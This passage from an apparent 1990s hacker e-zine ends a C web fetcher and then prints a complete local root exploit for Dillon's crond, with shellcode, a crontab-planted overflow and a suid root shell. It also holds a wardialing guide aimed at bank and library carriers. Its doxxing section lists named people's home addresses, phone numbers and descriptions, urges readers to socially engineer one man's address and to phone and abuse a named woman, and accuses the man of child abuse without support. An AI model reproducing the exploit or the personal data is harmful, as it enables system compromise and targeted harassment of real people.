  897.     if (!u.hostname) {
  898.         perror(pn);
  899.         return;
  900.     }
  901.     if ((sock = connect_url(u)) < 0)
  902.         return;
  903.     if ((outfd = open(u.file, O_WRONLY | O_CREAT | O_TRUNC, 0644)) < 0) {
  904.         perror(pn);
  905.         close(sock);
  906.         return;
  907.     }
  908. #if defined(__linux__)
  909.     i = sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n",
  910.         u.path, (nofetchfile == FALSE)?u.file:"/");
  911. #else
  912.     sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n",
  913.         u.path, (nofetchfile == FALSE)?u.file:"/");
  914.     i = strlen(tmp);
  915. #endif
  916.     if (send(sock, tmp, i, 0) < 0) {
  917.         perror(pn);
  918.         close(sock);
  919.         close(outfd);
  920.         return;
  921.     }
  922.     /* remove httpd header */
  923.     {
  924.         char c;
  925.  
  926.         j=0;
  927.         while (read(sock, &c, 1)) {
  928.             tmp[j++] = c;
  929.             if (c != '\n')
  930.                 continue;
  931.             if (j > 2) {
  932.                 tmp[j]=0; j=0;
  933.                 printf("%s: %s",u.file,tmp);
  934.                 fflush(stdout);
  935.                 continue;
  936.             }
  937.             break;
  938.         }
  939.     }
  940.     status("%s: Waiting for data connection...\r", u.file);
  941.     process_file(outfd, sock, &u);
  942. }
  943.  
  944. int main(argc, argv)
  945.     int argc;
  946.     char **argv;
  947. {
  948.  
  949.     if (argc < 2) {
  950.         printf("\nflea Web fetcher v%s by SrfRoG (srfrog@nema.com)\n\n", VERSION);
  951.         puts("\
  952. Usage: flea [http://host[:port][/][filename]]\n\n\
  953. If no file is given, the index file or file listing\n\
  954. is dumped to 'flea.dump'.\n\n\
  955. Examples:\n\
  956. \tflea http://www.cgifx.com/img/cgifx.gif\n\
  957. \tflea http://www.cgifx.com/img/\n\
  958. \tflea http://www.cgifx.com");
  959.         fflush(stdout);
  960.         return 1;
  961.         }
  962.  
  963.     pn = argv[0];
  964.  
  965.     launch_fetcher(argv[1]);
  966.  
  967.     return 0;
  968. }
  969.  
  970. ───────────────────────────────────────────────────────────────────────────────
  971.   4. Dillons Linux crond exploit : BM V  
  972. ───────────────────────────────────────────────────────────────────────────────
  973.  
  974. /*   Dillon's Crond v2.2 exploit            */
  975. /*                                          */
  976. /*   There exists a buffer overflow         */
  977. /*   in Slackware's /usr/sbin/crond         */
  978. /*   in the fdprintf() function from        */
  979. /*   subs.c [specifically vsprintf()]       */
  980. /*   Also take note that the overflow       */
  981. /*   was discovered by the KSRT team.       */
  982. /*                                          */
  983. /*   Simply compile and run this.           */
  984. /*   and look for a suid root shell         */
  985. /*   in /tmp (/tmp/XxX) in about one        */
  986. /*   minute. Also please use this in        */
  987. /*   a responsible manner.                  */
  988. /*                                          */
  989. /*   also try crondsploit 1000              */
  990.  
  991. #include <stdio.h>
  992. #include <stdlib.h>
  993. #include <sys/types.h>
  994. #include <unistd.h>
  995. #include <pwd.h>
  996.  
  997. #define DEFAULT_OFFSET 560
  998. #define DEFAULT_BUFFER_SIZE 980 
  999. #define TOTAL_BUFFER 4096
  1000.  
  1001. char shellcode[]=
  1002. "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
  1003. "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
  1004. "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
  1005. "\xd7\xff\xff\xff/tmp/xo";
  1006.  
  1007. long get_esp(void) {
  1008.    __asm__("movl %esp,%eax");
  1009. }
  1010.  
  1011. void calc_bs(int *bs_ptr)
  1012. {
  1013.         int len=0;
  1014.         struct passwd *p_name;
  1015.  
  1016.         /* dependant on length of username */
  1017.         p_name=getpwuid(getuid());
  1018.         len=strlen(p_name->pw_name);
  1019.         *bs_ptr = 986 - len;
  1020.         return;
  1021. }
  1022.  
  1023. int main(int argc, char **argv) {
  1024.         char *buff = NULL;
  1025.         unsigned long *addr_ptr = NULL;
  1026.         char *ptr = NULL;
  1027.         int i, ofs=DEFAULT_OFFSET;
  1028.         int bs=DEFAULT_BUFFER_SIZE;
  1029.         FILE *fp=NULL;
  1030.  
  1031.         /* probably will not need to give argument */
  1032.         if (argc==2)
  1033.                 ofs=atoi(argv[1]);
  1034.         calc_bs(&bs);
  1035.         buff=malloc(TOTAL_BUFFER);
  1036.         if(!buff) {
  1037.                 perror("malloc");
  1038.                 exit(EXIT_FAILURE);
  1039.         }
  1040.         ptr=buff;
  1041.         memset(ptr,0x90, bs-strlen(shellcode));
  1042.         ptr += bs-strlen(shellcode);
  1043.         for (i=0; i<strlen(shellcode); i++)
  1044.                 *(ptr++) = shellcode[i];
  1045.         addr_ptr = (long *)ptr;
  1046.         for (i=0; i<2; i++)
  1047.                 *(addr_ptr++)=get_esp()-ofs;
  1048.         ptr=(char *)addr_ptr;
  1049.         *ptr=0;
  1050.  
  1051.         /* create binary in /tmp to make suid shell */
  1052.         fp=fopen("/tmp/xo.c","w+");
  1053.         if (!fp) {
  1054.                 fprintf(stderr,"Can't open /tmp/xo.c for writing!");
  1055.                 exit(EXIT_FAILURE);
  1056.         }
  1057.         fprintf(fp,"#include <stdio.h>\n");
  1058.         fprintf(fp,"#include <stdlib.h>\n");
  1059.         fprintf(fp,"main() {\n");
  1060.         fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n");
  1061.         fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n");
  1062.         fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n");
  1063.         fprintf(fp,"}\n");
  1064.         fclose(fp);
  1065.         /* compile our program to create suid shell */
  1066.         system("cc -o /tmp/xo /tmp/xo.c");
  1067.         unlink("/tmp/xo.c");
  1068.  
  1069.  
  1070.         /* now use crontab to plant overflow for crond */
  1071.         fp=fopen("r00t","w+");
  1072.         if (!fp) {
  1073.                 perror("fopen");
  1074.                 exit(EXIT_FAILURE);
  1075.         }
  1076.         fprintf(fp,"%s\n",buff);
  1077.         fclose(fp);
  1078.  
  1079.         /* put our r00t crontab in crontabs directory */
  1080.         system("/usr/bin/crontab r00t");
  1081.         unlink("r00t");
  1082.  
  1083.         /* helpful reminder */
  1084.         printf("Now wait about 1 minute and look\n");
  1085.         printf("for the suid shell -> /tmp/XxX\n");
  1086.         exit(0);
  1087. }
  1088.  
  1089. ───────────────────────────────────────────────────────────────────────────────
  1090.   5. KDE klock local exploit : someone on bugtraq
  1091. ───────────────────────────────────────────────────────────────────────────────
  1092.  
  1093. ..included in kde.gz with this crh009.zip
  1094.  
  1095. ───────────────────────────────────────────────────────────────────────────────
  1096. ===============================================================================
  1097. ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
  1098. ===============================================================================
  1099. ───────────────────────────────────────────────────────────────────────────────
  1100.   1. Wardialing in the UK : Jf
  1101. ───────────────────────────────────────────────────────────────────────────────
  1102.  
  1103. Wardialing in the UK, for me, is a very interesting subject.  Although a lot of
  1104. the modern c0de kiddies consider it "old-sk00l" and see it as no use today, 
  1105. Wardialing is actually, in my opinion, one of the greatest Hacking related
  1106. things to do.  Hacking a Webpage is fun yes but an isolated carrier provides
  1107. much more entertainment and excitement, and via wardialing we aim to find
  1108. these carriers along with lots of other cool things which will provide the
  1109. phun.
  1110.  
  1111. All the time, I am approached and people ask me HOW TO wardial in the UK,
  1112. I always tell people its the same as in the UK, but people act so confused
  1113. about the whole idea of UK Wardialing.  Basically the little Windoze kiddies
  1114. see some old wardialer, try it out and find that the area code to enter is only
  1115. allowed to be up to 3 numbers long, therefore a US area code, with this they
  1116. panic and cry out for help. Or they download a version of ToneLoc and PANIC
  1117. because they do not understand the program, which CAN be used for UK
  1118. wardialing and its the one I always use.  This is where this help file is
  1119. intended to come in useful, it will guide you through the basics of wardialing
  1120. in the UK, and what you will find on your journey and it will also guide you
  1121. with using Toneloc succesfully to scan loads of numbers and gain interesting
  1122. results infinding carriers, VMBs, PBXs and numerous other interesting things.
  1123.  
  1124. ##############
  1125. Where to start
  1126. ##############
  1127.  
  1128. Wardialing is the process of scanning a large range of numbers and finding
  1129. interesting things, as I have already stated.  There are literally thousands
  1130. of Carrier Tones in England which all perform different tasks and are owned
  1131. by different companies.
  1132.  
  1133. For example -
  1134.  
  1135.         Banks                   (yes BANKS, hehe), 
  1136.         Libraries               (delete those excess fines)
  1137.         Local Government        (piss off your council)
  1138.  
  1139.         ..and loads more big companies and organisations.
  1140.  
  1141. It may sound like a little movie-style picture of hacking (WARGAMES comes to
  1142. mind) but its REAL, it does exist and people do mess with this sort of thing,
  1143. hehe. Certain Carrier tones can also be abused and be setup so that you can
  1144. connect perfectly to the Internet which will result, if the carrier is located
  1145. within a FREE CALL netw0rks, in an 0800 dialup.  
  1146.  
  1147. People tend to mainly wardial for carrier tones but VMBs and PBXs can be found
  1148. by Wardialing as well, so wardialing provides a great use for Phreaks who are
  1149. interestedin these things.  Although I personally haven't found an PBX while
  1150. wardialing for about 6 months but, someone, somewhere will no doubt be finding
  1151. one and abusing one as I type. VMBs are common findings while wardialing,
  1152. especially on FREE CALL netw0rks and I have great phun with these.
  1153.  
  1154. The 0800/0500 Service Network numbers, which are of course FREE, are the best
  1155. place to start wardialing due to the LARGE percentage of businesses who have
  1156. carriers located on them, to transfer data from area to area at low cost
  1157. (only rental of number). It is also a lot safer to wardial than normal area
  1158. codes because you will not be dialing peoples houses, so you can dial 0800/0500
  1159. numbers at night and not be waking people up (not that I care, its just that
  1160. they might report the wardialing call to BT as a nuisance call).
  1161.  
  1162. If you like the idea of Blueboxing then the 0800 89 **** number block will
  1163. interest you. As you may already know, this block of numbers act as the
  1164. COUNTRY DIRECT numbers, with some being boxable.  From wardialing you will be
  1165. able to note which ones are boxable if you listen into the wardialing progress,
  1166. as boxable numbers (CCITT5 Lines) will give a little series of bleeps when they
  1167. pickup, these are instantly recognisable and if you here this you will know that
  1168. it is boxable.
  1169.  
  1170. Well thats a basic introduction into the uses of Wardialing in the UK, so how
  1171. bout it? Are you ready to step into this world? This is the real deal and could
  1172. land you in a lot more trouble than a webpage hack, no doubt most people reading
  1173. this will have already delved into wardialing as it is nothing new but some
  1174. newbies to the subject might be a little misguided about the whole wardialing
  1175. deal...
  1176.  
  1177. #######
  1178. ToneLoc
  1179. #######
  1180.  
  1181. Yes, This is the wardialer that I recommend for wardialing in the UK, it is
  1182. however one of the mose complicated to understand if you have never used it
  1183. before, but this section will explain how to use ToneLoc to its full
  1184. capabilities and get scanning straight away.  A download URL for ToneLoc is
  1185. provided in the *URLs* section of this paper.
  1186.  
  1187. Right, lets get started...We will keep the example simple by using the same
  1188. variables throughout this section.  When you are actually doing your own
  1189. wardialing you will of course need to change these variables.  People who have
  1190. read the ToneLoc User Docs may find some of this familiar but some people DO
  1191. NOT realise that the examples in the user docs CAN be interpreted into UK use.
  1192.  
  1193. For this papers example we are going to scan the 0800 666 *** range which will
  1194. provide us with 100 results.  It is easy to make this scan A LOT bigger but
  1195. for times sake we are going to look at this example now.
  1196.  
  1197. Now we have discussed the variables of this example we can get down to using
  1198. ToneLoc.
  1199.  
  1200. First of all you need to restart your computer in DOS m0de and enter the
  1201. ToneLoc directory. The First thing you need to do is to set the CONFIGURATION
  1202. SETTINGS to what you require. So, open TLCFG.EXE and you will see 6 menus at
  1203. the top of the screen.
  1204.  
  1205. The *FILES* menu is used to change any log files that are used in the program.
  1206. You can edit the names of these log files from this menu but its easiest to
  1207. keep the names the same, from this menu you can easily see what the function of
  1208. each .log file is.
  1209.  
  1210. The *MODEM STRINGS* menu is used to setup the modem sequence for dialing etc.
  1211. Here is where you need to enter your dialing prefix (0800) so that the program
  1212. understands our range. 
  1213.  
  1214. The *MODEM OPTIONS* menu is for your modem settings such as Com Port, Baud Rate,
  1215. IRQ etc. I would recommend setting your baud rate at 19200 even if you have a
  1216. faster modem, the program (due to being 4 yrs old) doesn't seem to like any
  1217. baud rate above 19200.
  1218.  
  1219. The *SCAN OPTIONS* are the options which you may want to change which affect
  1220. what it happening during the scan. eg. Sound, Wait Delay etc. I would recommend
  1221. the Wait Delay being quite small to make the scan run faster but remember to
  1222. keep it long enough for lines to pickup and for ToneLoc to register whether
  1223. the line is a carrier, PBX, VMB, or Normal Line.
  1224.  
  1225. The *COLORS* menu is just for editing the colors of the program. Nothing major
  1226. to worry about.
  1227.  
  1228. And finally, the *QUIT* menu is where you can chose to save or abort changes
  1229. made to the configuration file.
  1230.  
  1231. If you have looked through all those menus you will see that there is a lot of
  1232. different things that you can change and play with and by now, you should know
  1233. which ones to change to suit your UK Wardialing needs.
  1234.  
  1235. Now that you should have all the configuration of ToneLoc setup SPECIFICALLY
  1236. for your scanning needs we can get down to some major wardialing. If it is your
  1237. first time using ToneLoc you will need to just open TONELOC.EXE and read the
  1238. stuff it brings up.
  1239.  
  1240. As you can probably see, there are LOTS of parameters within ToneLoc that can
  1241. be used when scanning. ToneLoc allows for a lot of user choice which is
  1242. something that attracts me to using it.  For example, you can easily program
  1243. the number range to scan and the number range to exclude from the scan by just
  1244. selecting a different parameter.
  1245.  
  1246. To scan a range of numbers in the 0800 prefix - eg. 0800-666-100 <-->
  1247. 0800-666-200 the command at the DOS prompt would be :-
  1248.  
  1249. TONELOC 666-XXX /R:100-200
  1250.  
  1251. This would then scan all the numbers between 0800-666-100 and 0800-666-200 and
  1252. log the results into the log files specified in the *FILES* configuration menu.
  1253. This is the option I use the most and its the parameter I recommend you get to
  1254. know well.
  1255.  
  1256. Next, suppose you want to scan all the numbers between 0800-666-000 and
  1257. 0800-666-999, but you had already scanned the 0800-666-100/200 section in your
  1258. last scan. This is where the EXCLUDE parameter comes into use.
  1259.  
  1260. TONELOC 666-XXX /D:100-200
  1261.  
  1262. This would result in you scanning all numbers 0800-666-000 <--> 0800-666-999
  1263. Excluding 0800-666-100 <--> 0800-666-200
  1264.  
  1265. If you look at the ToneLoc User Guide included in the tl110.zip you will see
  1266. this explained as well as lots of other ways to scan.
  1267.  
  1268. Another Favourite of mine is to use the following command line.
  1269.  
  1270. TONELOC 666-XXX
  1271.  
  1272. This will scan 0800-666-000 <---> 0800-666-999  and it will save the results to
  1273. the data file 666-XXX.dat.  You must always remember to have the correct
  1274. variables added into the Configuration program.
  1275.  
  1276. Now that you know the basic and most used parameters of ToneLoc its time to get
  1277. Wardialing.
  1278.  
  1279. If you watch a wardialing session you will see that it seperatly dials each
  1280. number and tells you whats happening on screen. It will tell you when it finds
  1281. anything interesting such as a *gasp* Tone, a Carrier or a Voice and it also
  1282. appends the results to the log file so you can remember the numbers of
  1283. interesting stuff and go back and play with them later.
  1284.  
  1285. You must remember that the fun does not end at Wardialing, a lot of people
  1286. find wardialing and scanning boring, but I find it one of the more interesting
  1287. parts of Hacking/Phreaking as you never know when your going to be lucky enough
  1288. to jump upon a neat carrier (for a bank, hehe), a PBX or a VMB, the fun starts
  1289. here. You need to follow all your wardialing findings up and learn how to use
  1290. what you have found in a way which benefits you, after all isn't that the aim?
  1291.  
  1292. ####
  1293. URLs
  1294. ####
  1295.  
  1296. Below are the necessary URLs to download ToneLoc and maybe find out more
  1297. information about Wardialing in general.
  1298.  
  1299. First of all you will NEED a copy of ToneLoc (the wardialer I am recommending)
  1300.  
  1301.         http://www.linenoise.org/philez/wardialers/tl110.zip
  1302.  
  1303.  
  1304. Now that you have started Wardialing in the UK, how about sharing some of your
  1305. findings or finding people who may help you on your quests and related projects.
  1306. The Linenoise WWWBoard is a place for this to come to life.
  1307.  
  1308.         http://www.linenoise.org/wwwboard/
  1309.  
  1310. ###
  1311. End
  1312. ###
  1313.  
  1314. Well, thats all the Information that you need to get you going with Wardialing
  1315. in the UK and using ToneLoc successfully, just be careful and remember that
  1316. you're responsible if you fuck up, you cannot blame me, the teacher is not to
  1317. blame. In the near future I would like to c0de a Wardialer specifically for the
  1318. UK, which would be easy to use, understand and gain successful results from.
  1319. It is a project that I always keep on the back burner but if enough people
  1320. wanted to see it, I might bring it foward, let me know...
  1321.  
  1322. Jf_
  1323. <JF@linenoise.org>
  1324.  
  1325. ───────────────────────────────────────────────────────────────────────────────
  1326. ===============================================================================
  1327. ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
  1328. ===============================================================================
  1329. ───────────────────────────────────────────────────────────────────────────────
  1330.   1. p0sse.rolodex (mad outdated anyway) : juurigaveitout
  1331. ───────────────────────────────────────────────────────────────────────────────
  1332.  
  1333. Alan Wilson (aka. "w1ng")
  1334. 58 Moon Drive                     215-305-8379 <pager>
  1335. Morrisville, PA  19069            215-736-1863 <voice>
  1336. Drexel University                 215-752-1324 <SCC for his 5E>
  1337. wing@dunx1.ocs.drexel.edu
  1338.  
  1339. Known Sites:  *.drexel.edu, *.rutgers.edu, *.delphi.com.
  1340.  
  1341. Short brown hair, brown eyes.  Approximately 5'10 130 pounds. 
  1342. Very scrawny appearence.  Roughly 19 to 20 years old.  Commutes
  1343. to Drexel University from his home in Morrisville.  Computer 
  1344. Science major.  Works part time doing Data-Entry.  Egomaniacle, 
  1345. novice UNIX experience, short-tempered, hostile and arrogant.
  1346.  
  1347. Logs:
  1348. [dunx1.ocs.drexel.edu]
  1349. Login name: wing                        In real life: Wong Ing
  1350. Directory: /home/dunx1/under/wing       Shell: /bin/sh
  1351. Last login Fri Feb 25 19:21 on ttyqf from gandalf.rutgers.edu
  1352. New mail received Sat Feb 26 12:00:09 1994;
  1353.   unread since Fri Feb 25 19:27:18 1994
  1354. No Plan.
  1355.  
  1356. ______
  1357.  
  1358. Don Neumann (aka. "peaboy", "speedin")
  1359. 7340 Hayward Drive                216-656-1912 <voice>
  1360. Chardon, Ohio                     216-650-5181 <data>
  1361.  
  1362. Known Sites:  *.DELPHI.COM, *.MsState.edu, *.wustl.edu
  1363.  
  1364. 16-17 years of age.  Dropped out of his local High School his Senior
  1365. year.  Works part time as a desk clerk at a local motel.  He is not
  1366. attending a college, and presumably has no GED.  
  1367. _____
  1368.  
  1369. Steven Dake (aka. "riley" "renegade bit head" "rbh")
  1370. 1731 North Fairway
  1371. Flagstaff, Arizona 86011          602-526-9184 <home>
  1372. North Arizona University (NAU.EDU)
  1373. Email unknown.
  1374.  
  1375. Known Sites: herbon.connected.com, *.NAU.EDU, *.CS.UTC.EDU,
  1376.              ballison.extern.ucsd.edu, *.caltech.edu.
  1377.  
  1378. Appearance unknown.  Approximately 20-23 years of age.   Computer
  1379. Science major, second of third year.  He lives on campus in the
  1380. dormitories.  His parents reside at the North Fairway address.
  1381. He often comes out of UTC.EDU and CONNECTED.COM.,
  1382.  
  1383. _____
  1384.  
  1385. Greg Perry (aka. "z00m" "digital hitler" "j00" "gary" "Gary Seven")
  1386.  
  1387. Known Sites: *.cftnet.com
  1388.  
  1389. _____
  1390.  
  1391. Lane Davis Jr. (aka. "merc")
  1392. Phoenix, Arizona                 602- <home> <unlisted>
  1393.  
  1394. Known Sites: NAU.EDU, indirect.com, internet.com, 
  1395.  
  1396. _____
  1397.  
  1398. (aka. "Sciz")
  1399.  
  1400. Known Sites: *.drexel.edu
  1401.  
  1402. 6'10 155, very scrawny.  Short permed blonde hair, blue or green eyes.
  1403. Freshman or Sophomore at Drexel University.  Lives in a dormitory on
  1404. campus.  Good friends with Alan Wilson.  He rides an unregistered Honda
  1405. Motorcycle.
  1406.  
  1407. _____
  1408.  
  1409. Scott (aka. "X")
  1410.  
  1411. Known Sites: CAPELLA.CS.UTC.EDU, HOBBES.CS.UTC.EDU, EXPLORER.CS.UTC.EDU.
  1412. Email: X@capella.cs.utc.edu
  1413.  
  1414. He attends and apparently administers part(s) of the CS.UTC.EDU school
  1415. and domain.  He has Brown hair, small build, 5'9" tall, about 155 pounds,
  1416. brown eyes.
  1417.  
  1418. _____
  1419.  
  1420. Chris Fisher (aka. "y", "Y-W1nD0z3")
  1421.  
  1422. Known Sites: uahcs2.cs.uah.edu, grendel.cs.uah.edu, tycho.cs.uah.edu
  1423. Email: cfisher@uahcs2.cs.uah.edu
  1424.  
  1425. Very egomaniacle.  Known for harassing CERT in news groups:
  1426.  
  1427. ] X-News: uqvax comp.security.unix:4675
  1428. ] From: crfisher@nyx10.cs.du.edu (I am being repressed.)
  1429. ] Subject:Cert; my what a witty bunch.
  1430. ] Date: Mon, 11 Apr 94 19:52:33 GMT
  1431. ] Message-ID:<1994Apr11.195233.17351@mnemosyne.cs.du.edu>
  1432. ]
  1433. ] Once again cert proves what a great bunch of guys they are. I guess they had
  1434. ] never heard of gnufinger before...isn't it amazing that some people still
  1435. ] respect them?
  1436.  
  1437. Logs:
  1438. *** irc.netsys.com : Thursday April 21 1994 -- 22:30 -07:00
  1439. *** y is root@deimos.cs.uah.edu (root)
  1440. *** on channels: #tacobell @#fedz @#lifesux 
  1441. *** on irc via server irc.math.ufl.edu (The Happiest Server on IRC)
  1442. _____
  1443.  
  1444. Oliver Friedrichs (aka. ][ceman)
  1445. Known Sites: bova.cc.umanitoba.ca
  1446. Email: umfriedr@bova.cc.umanitoba.ca
  1447.  
  1448. He is Canada local, he dials into "umfriedr.dial.umantobia.ca" and from
  1449. there likes his accounts at various machines in the cc.umanitoba.ca domain.
  1450. _____
  1451.  
  1452. (aka. "N0-D0Z3")
  1453. Known Hacked Sites: stdkrl@pip.shsu.edu
  1454.  
  1455. This guy is a mystery.  He is very malicious.  He has apparently hacked
  1456. all sorts of a long list of sites.  He is currently (940421) on the
  1457. "west coast" but is moving to Pittsburg next month.
  1458.  
  1459. Logs:
  1460. *** irc.netsys.com : Thursday April 21 1994 -- 18:30 -07:00
  1461. *** X is ~X@CAPELLA.CS.UTC.EDU (X)
  1462. *** on channels: #tacobell 
  1463. *** on irc via server Copper.Ucs.Indiana.Edu ([129.79.1.4] Indiana
  1464. +Experimental ALPHA AXP Server)
  1465. *** N0-D0Z3 is stdkrl@pip.shsu.edu (KATRINA RUTH LOUNSBERRY)
  1466. *** on channels: #tacobell 
  1467. *** on irc via server irc-2.mit.edu (Mass. Institute of Technology, Cambridge,
  1468. +MA, USA)
  1469. <N0-D0Z3> well, u guyz missed alot.. I came about this: --><-- close to
  1470. +getting my ass busted... I sorta did get busted actually..
  1471. <N0-D0Z3> I fuckin broke into the high school where I lived and stole some
  1472. +kewl shit... they found out it was me some how, and I split.
  1473. <N0-D0Z3> they got my picture plastered all over where I used to live.. fuck
  1474. +wantedand all that shit.. ehehe.. oh well.. I still got me a 386DX-40 out of
  1475. +it.
  1476. <N0-D0Z3> I took two full machines(cases) and one monitor.
  1477. <N0-D0Z3> X:I went the first night and got two machines.. full cases etc, one
  1478. +monitor and a keyboard...
  1479. <N0-D0Z3> I went back not the next night, but the night after, and got all the
  1480. +processors, the 1 gig HDD's from the two servers, novell netware boxed set,
  1481. +and then a camcorder and cd-rom from the library..
  1482. <N0-D0Z3> I came back to my house at about 3:00 am and my mom was home, so I
  1483. +fucking hid the shit behind the apartments and went to my friends who went
  1484. +with me and slept at his house, and when I went home the next day, suprise,
  1485. +it was all gone.
  1486. *** irc.netsys.com : Thursday April 21 1994 -- 18:31 -07:00
  1487. _____
  1488.  
  1489. (aka. "Dynastar")
  1490.  
  1491. He attends Carnegie Mellon University studying Mathematics (applying
  1492. for CS major there).  He is very fluent in 8051 Assembly (motorola)
  1493. and is a major Cellular Phone modification jockey.  He is probably
  1494. one of the best at this, and his Cellular mod for th 
  1495. He is one of these people:
  1496.  
  1497. [unix6.andrew.cmu.edu] 
  1498. dsa3     David Reeve Sward    *p1      Thu 15:15 
  1499. jl6b     Jesse L. Liu          p2      Thu 16:56 
  1500. jc7o     Joo C. Chung          p3      Thu 21:20 
  1501. jmdk     Jason C Miller        p4      Thu 18:42 
  1502. mh5u     Mathew Henson         pb      Thu 21:47 
  1503. _____
  1504.  
  1505. Evan Baker (aka. "Nightstriker")              voice: +1 301 390 1097
  1506. High School Student
  1507. Lives close to the campus of University of Maryland
  1508. College Park.
  1509.  
  1510. Big UMD.EDU and GMU.EDU hacker.  Past relations with various "posse"
  1511. members.
  1512. _____
  1513.  
  1514. (aka. "Vaxbuster")
  1515.  
  1516. This may not be his real name, but this is the account he uses
  1517. every time.
  1518.  
  1519. [unixd3.cis.pitt.edu]
  1520. Login name: cxzst1                      In real life: Cheng Zhao
  1521. Directory: /afs/pitt.edu/usr66/cxzst1   Shell: /bin/bash
  1522. Address mail to: cxzst1+@pitt.edu
  1523. Affiliation: Universal Student Computing [Provost]
  1524. Account used on Wed Apr 20 16:23 (1 day 9 hours ago).
  1525. No new mail; last read Tue Apr  5 23:34 (16 days ago).
  1526. Plan:
  1527.  
  1528. Home Phone        : 291-6799          
  1529. _____
  1530.  
  1531. Louis (aka. "Clovis")
  1532. Known accounts: afo3cmm@cabell.vcu.edu
  1533.  
  1534. DC/VA/MD Local.  Attends 2600 meetings regularly.  Very blonde
  1535. hair, blue eyes.  About 5'11 inches, dresses funny, about
  1536. 130-135 pounds.  Not attending school currently.
  1537. _____
  1538.  
  1539. Dennis Sheil (aka. "Elite Entity", "Point of Presence") voice: +1 718-762-1597
  1540. 35-19 165th Street
  1541. Flushing, NY
  1542.  
  1543. Email: elite@mindvox.phantom.com
  1544. _____
  1545.  
  1546. ───────────────────────────────────────────────────────────────────────────────
  1547.   2. RLoxley, first class fuckwit (and fatboy) : WH0 GN0Z?
  1548. ───────────────────────────────────────────────────────────────────────────────
  1549.  
  1550. There is a user on the Undernet IRC network called "RLoxley", he is a lame fuq,
  1551. he is also very fat, a compulsive liar, and child abuser..
  1552.  
  1553. He even moved house because of the abuse he was getting because of the way he
  1554. treats his two daughters (RLoxley is around 40 btw).
  1555.  
  1556. These are his old d0x from the 0wned.rolodex :
  1557.  
  1558.  
  1559.         Handles      : RLoxley, RLox1ey, op in #hackphreak on UnderNet.
  1560.         Name         : Kent Browne
  1561.         Phone        : (914) 628-6281
  1562.         Address      : 29 Mcgregor Drive
  1563.                        Mahopac, NY 10541
  1564.         -
  1565.         E-Mail       : mageus@bestweb.net
  1566.         -
  1567.         Wife's Name  : Colleen Browne
  1568.         -
  1569.         Other Family : Two daughters, one aged 6,
  1570.                        the other is 2 months old,
  1571.                        RLoxley abuses them on a daily basis..
  1572.  
  1573.  
  1574. If anyone socially engineers the people living at his old address for his
  1575. new mailing address and even a phone number, we will be mad impressed.
  1576.  
  1577. Here is an IRC log of so1o making RLoxley look like a fag.. (Malaka == RLoxley)
  1578.  
  1579. *** savec0re (~savec0re@zphn1-p107.worldonline.nl) has left #rhino9
  1580. <o1os> heh
  1581. <o1os> i just did something neat in #hackphreak
  1582. <o1os> heh
  1583. *** o1os is now known as os1o
  1584. *** os1o is now known as savec0re
  1585. *** Malaka (mageus@x2-7.katonah.bestweb.net) has joined #rhino9
  1586. <Malaka> where did pussy boy go?
  1587. <savec0re> *** so1o has quit IRC
  1588. <savec0re> ?
  1589. <savec0re> you mean so1o rlox?
  1590. <Malaka> yes, he is a wimp
  1591. *** Malaka is now known as RLox1ey
  1592. <savec0re> bbl
  1593. <RLox1ey> [13:57] <o1os> "RLoxley is looking for nominations on his new friends, please call 1-800-fagchat now and cast your vote"
  1594. <RLox1ey> now that he cant find me any more
  1595. <RLox1ey> this is what he resorts to
  1596. * su1d is away, auto-gone [tv/l]
  1597. *** chameleon (333@cx640648-a.msnv1.occa.home.com) has joined #rhino9
  1598. *** SyndIcate sets mode: +o chameleon
  1599. *** chameleon sets mode: +o savec0re
  1600. *** savec0re is now known as so1o
  1601. *** so1o sets mode: +b *!*@x2-7.katonah.bestweb.net
  1602. *** RLox1ey was kicked by so1o (he0ahe0ahah0aha)
  1603. <so1o> HAHAHAHAHAHHAHAA
  1604. <so1o> WHAT A LAME FUQ
  1605.  
  1606. Anyway, someone pull his new d0x.. mail them to tk85@hotmail.com or /msg so1o
  1607. on any IRC network..
  1608.  
  1609. ───────────────────────────────────────────────────────────────────────────────
  1610.   3. Carolyn Meinel d0x : savec0re
  1611. ───────────────────────────────────────────────────────────────────────────────
  1612.  
  1613. Carolyn Meinel, unless you didn't already know, runs the happyhacker mailing
  1614. list for lame fuqz with no sk1llz, she herself however, also has no sk1llz,
  1615. and so is classified by the el8 board of classification is a LAME FUQ.
  1616.  
  1617. Phone her up and abuse her today..
  1618.  
  1619. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1620. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1621. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1622. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1623. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1624. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1625. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1626. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1627. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1628. (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675  (505) 281-9675
  1629.  
  1630. ───────────────────────────────────────────────────────────────────────────────
  1631. ===============================================================================
  1632. ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
  1633. ===============================================================================
  1634. ───────────────────────────────────────────────────────────────────────────────
  1635.   1. MOD break DISN : Wired News
  1636. ───────────────────────────────────────────────────────────────────────────────
  1637.  
  1638.   In what may be one of the first demonstrations of
  1639.   the potential of cyber warfare, an international
  1640.   cracking group claims it has stolen a suite of
  1641.   programs used to run classified US military
  1642.   networks and satellites. 
  1643.  
